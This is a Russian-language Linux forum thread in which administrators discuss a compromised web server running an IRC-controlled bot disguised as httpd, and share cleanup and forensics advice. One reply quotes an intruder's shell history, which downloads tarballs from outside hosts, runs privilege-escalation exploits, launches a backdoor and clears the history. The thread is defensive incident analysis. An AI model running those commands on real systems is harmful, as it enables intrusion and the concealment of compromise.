LINUX.ORG.RU
ФорумSecurity

Нас немножко поломали. Помогите опознать.


0

0 

 Несколько дней назад был замечен аномально большой трафик по udp.
Разбор полетов показал следующее:


[root@www httpd]# lsof |grep 12159
[httpd]   12159 apache  cwd    DIR     130,32     1024  22773859 /tmp/...
[httpd]   12159 apache  rtd    DIR     130,32     1024  64299089 /
[httpd]   12159 apache  txt    REG     130,32   612470  22773863 /tmp/... /[httpd]
[httpd]   12159 apache    0u  IPv4   86945779                TCP mysite1.ru:58139->ede.nl.eu.undernet.org:ircd (ESTABLISHED)
[httpd]   12159 apache    3u  IPv4      19070                TCP *:http (LISTEN)
[httpd]   12159 apache    4r  FIFO      130,5            1212635 pipe
[httpd]   12159 apache    5w  FIFO      130,5            1212635 pipe
[httpd]   12159 apache    6u   REG     130,32   108749  12640358 /var/log/httpd/error_log
[httpd]   12159 apache    7u   REG     130,32      248  23838748 /home/webadmin/mysite2.ru/error_log
[httpd]   12159 apache    8u   REG     130,32      128  24936449 (deleted) /home/webadmin/mysite3.ru/error_log.1
[httpd]   12159 apache    9u   REG     130,32     2234  63201402 /home/webadmin/mysite1.ru/error_log
[httpd]   12159 apache   10u   REG     130,32        0  57688162 /home/webadmin/mail.mysite1.ru/error_log
[httpd]   12159 apache   11u   REG     130,32   374954  29262047 /home/pubmysite1/new.mysite1.ru/error_log
[httpd]   12159 apache   12w   REG     130,32      840  12640347 /var/log/httpd/access_log
[httpd]   12159 apache   13w   REG     130,32     2156  23838761 /home/webadmin/mysite2.ru/access_log
[httpd]   12159 apache   14w   REG     130,32     1174  24936478 /home/webadmin/mysite3.ru/access_log
[httpd]   12159 apache   15w   REG     130,32    11378  63201449 /home/webadmin/mysite1.ru/access_log
[httpd]   12159 apache   16w   REG     130,32        0  57688144 /home/webadmin/mail.mysite1.ru/access_log
[httpd]   12159 apache   17w   REG     130,32 10450969  29262055 /home/pubmysite1/new.mysite1.ru/access_log
[httpd]   12159 apache   18w   REG     130,32    11378  63201449 /home/webadmin/mysite1.ru/access_log
[httpd]   12159 apache   19u  sock      130,3              22784 can't identify protocol
[httpd]   12159 apache   20u  sock      130,3            1212653 can't identify protocol
[httpd]   12159 apache   21u  sock      130,3            1999093 can't identify protocol
[httpd]   12159 apache   22r   REG     130,32     5611  41468183 /var/www/html/phpAdsNew/st.php
[httpd]   12159 apache   23u  unix 0x8eb9cdc0            1999050 socket
[httpd]   12159 apache   24u  unix 0xde9deee0            2353149 socket
[httpd]   12159 apache   25u  IPv4    2353162                TCP *:2345 (LISTEN)
[httpd]   12159 apache   26u  IPv4    2388644                UDP *:34047
[root@www httpd]#

[root@www root]# ls -lah /tmp/...\ /
total 825K
drwxr-xr-x    3 apache   apache       1.0K Sep 12 05:00 .
drwxrwxrwt    8 root     root          29K Sep 17 11:48 ..
-rw-r--r--    1 apache   apache        189 Sep 17 11:00 1
-rw-r--r--    1 apache   apache        13K Sep 17 11:40 Ovidiu.seen
-rwx------    1 apache   apache       598K Apr 21 02:49 [httpd]
-rwxr-xr-x    1 apache   apache       166K Sep 12 04:04 pico
drwxr-xr-x    2 apache   apache       1.0K Feb 23  2005 randfiles
-rw-r--r--    1 apache   apache       1.0K Sep 17 11:00 raw.levels
-rw-------    1 apache   apache          6 Sep 12 04:04 raw.pid
-rw-r--r--    1 apache   apache        622 Sep 17 11:00 raw.session
-rw-r--r--    1 apache   apache       2.3K Apr 21 02:50 raw.set
-rwxr-xr-x    1 apache   apache        160 Mar  8  2005 shit
[root@www root]#

содержимое /tmp/...\ / можно посмотреть здесь : http://slil.ru/23131394
пароль: linux

Я все удалил, в iptables все прикрыл - пока тихо.
Вопрос - что это такое: udp-proxy управляемый по irc?
Могло ли оно получить рутовые права?
На сайте крутится Apache+PHP+MySQL не первой свежести и битрикс до кучи.
Что крутить в первую очередь, чтобы не было рецидива?
Глюк в консоли Fedora Core 3
SELinux file context

чтобы небыло рецидива, надо узнать откуда оно появилось и залатать дыру. обычно это делается с отключения сервера от сети и полным его анализом, что включает в себя анализ всех логов какие только доступны. общие рекомендации как обычно, обновить софт, не писать дырявых скриптов на веб, etc...

anonymous
()

Если у вас было старое 2.6 ядро, то, скорее всего, вас поимели полностью (root access) и единственный способ исправить положение - переустановка с нуля.

birdie ★★★★★
()

да, кстати, если вы процесс еще не убили, попробуйте прочитать этот файл (deleted) /home/webadmin/mysite3.ru/error_log.1

Я думаю, в скриптах где-то инджекшн какой-нибудь. Курите логи, если они еще не подчищены.

ivlad ★★★★★
()
Ответ на: комментарий от ivlad

К сожалению уже убил. А насколько вероятно что у нас то, что описано на трендмикро - там упоминается полное управление зараженной машиной вплоть до введения сетевого интерфейса в прослушивающий режим ? Но сама дата статьи 2002 год, а сервер был введен в строй год назад.

Realtex-sux
() автор топика
Ответ на: комментарий от Realtex-sux

Это весьма возможно.. Зря вы вот так вот сразу всё затёрли.. Надо было бы попытаться таки определить источник атаки и возможные последствия..

MiracleMan ★★★★★
()
Ответ на: комментарий от MiracleMan

Уже понял что с deleted файлом промахнулся, но может кто-нибудь с содержимым по ссылке сталкивался? Стирал только /tmp/... / и сделал kill -9 12159, остальные логи остались - пытаюсь найти, где оно пролезло.

Realtex-sux
() автор топика
Ответ на: комментарий от Realtex-sux

> Уже понял что с deleted файлом промахнулся, но может кто-нибудь с содержимым по ссылке сталкивался?

http://www.sleuthkit.org/autopsy/ вот этим попробуйте.

Я склонен подозревать бажный php-скрипт... Курите логи.

ivlad ★★★★★
()
Ответ на: комментарий от anonymous

Всем спасибо. Ни rkhunter, ни clamav ничего подозрительного больше не обнаружили, но все равно было принято решение переставить сервер.

Realtex-sux
() автор топика
Ответ на: комментарий от LifeWins

Меня ломанули на днях почти таким же образом - повесили два "левых" сервиса - bash и crond. Левый "bash" позволял обходить root, "crond" - какой-то IRC-сервер или шлюз.
Зашли через ssh; откуда взяли пароли - вопрос остается открытым.
Посмотри внимательно через lsof -i - куда кто коннектится. Процесс httpd, идущий на undernet.org убей.
Посмотри во всех домашних каталогах каталог ". " (трудно заметить; лучше смотреть ч/з mc). Или м.б. каталог ./intel.
Вот протокол моего взлома:
---------------------------
679 uname -a
680 cat /etc/issue
681 wget geocities.com/lothusd/d/intel.tgz
682 tar xzvf intel.tgz
683 rm -rf intel.tgz
684 cd intel/
685 ./0
686 ./0
687 id
688 su -
689 ./0
690 ./100
691 ./100
692 php -v
693 sednmail
694 sendmail
695 cat /proc/cpuinfo
696 wget whitehat.ro/~mosu/monibut.jpg
697 tar xzvf monibut.jpg
698 rm -rf monibut.jpg
699 cd ". "
700 ./init
701 history -c -d offset
-----------------
Внимательно изучи другие процессы - могут висеть трояны под именами "bash", "crond", "init" и пр.
P.S. Apache у нас стоит, но доступ только из локалки - извне и порты закрыты, и слушает он 192.168.x.x

anonymous
()
Ответ на: комментарий от anonymous

whois whitehat.ro (так как на нем собственно набор утилит и был под названием картинки) и было бы клева знать что полагается хакеру по румынским законам, а так только сообщить в центр регистрации доменов в зоне .ro что whitehat.ro это хакеры.

anonymous
()
Ответ на: комментарий от anonymous 

В одной конторе вот как поломали:

На одном из компов под "окнами", на котором иногда седел
админ и заходил на линукс сервера, народ лазил в инете "интернет
експлодером", лазили кто-где, подхватили троян. Троян подвесил ки-логер,
тот перехвитил логи/пароль админа, не рутвый, и передал "куда нада".
Зашли на этот сервер, благо ssh был открыт на время, поставили rootkit,
не помню какой, заменял процесс init своим с ssh. Вовремя народ спохватился, запустили rkhunter, нашли, отключили, в общем "не доломали"
как следует =)

LifeWins
()
Ответ на: комментарий от anonymous

> whois whitehat.ro (так как на нем собственно набор утилит и был под названием картинки) и было бы клева знать что полагается хакеру по румынским законам, а так только сообщить в центр регистрации доменов в зоне .ro что whitehat.ro это хакеры.

Хакеры тебе дали доступ к компьютеру и интернету, это благодаря им ты теперь имешь возможность поносить на этом форуме!

anonymous
()

Может какой-то брутфорсер по SSH? Если пароль не особо сложный, ССЗБ.

anonymous
()
Ответ на: комментарий от anonymous

У меня в офисе за последние 2 месяца 10000 попыток брутфорса пароля по SSH для нерутовых пользователей и 70 для рута.

anonymous
()
Ответ на: комментарий от anonymous

>У меня в офисе за последние 2 месяца 10000 попыток брутфорса пароля по >SSH для нерутовых пользователей и 70 для рута.

во-во за прошлый год более 30000 неудачных попыток входа на сервер. От греха подальше открыл ssh только для "хороших" ip.

vtVitus ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
Глюк в консоли Fedora Core 3
Security
SELinux file context